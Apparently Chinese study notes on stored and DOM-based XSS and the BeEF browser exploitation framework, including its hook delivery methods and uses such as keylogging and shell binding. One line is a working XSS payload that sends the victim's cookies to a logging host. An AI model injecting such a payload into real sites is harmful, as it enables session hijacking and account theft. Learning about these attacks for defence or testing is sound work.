存储型XSS
长期存储于服务器
每次用户访问多会被执行
利用
截断代理、客户端(直接在本地html修改限制)
DOM型XSS(也属于反射型)
利用DOM对象
利用方法
<script>var img=document.createElement("img");img.src="http://192.168.20.8:88/log?"+escape(document.cookie);</script>
BEEF
浏览器漏洞利用框架
浏览器攻击面
应用普遍转移到B/S架构,浏览器称为统一的客户端程序
结合社工方法对浏览器进行攻击
攻击浏览器用户
通过注入js脚本,利用浏览器攻击其他网站
(Browser exploitation framework)
生成 交付 payload
Ruby语言编写
服务器端:管理hooked客户端
客户端:运行于客户端浏览器上的js脚本(hook)
攻击手段(典型的)
利用XSS
诱使客户端访问hook的伪造站点
结合中间人攻击注入hook脚本
常见用途
键盘记录器
网络扫描
浏览器信息收集
绑定shell
与metasploit集成
Commands 命令模块
绿色 表示模块适合目标浏览器,并且执行结果客户端看不见
红色 模块不适用于目标浏览器,但是有的可以执行
橙色 模块可用,但结果对用户可见(CAM弹窗申请权限等)
灰色 模块未在目标浏览器上测试过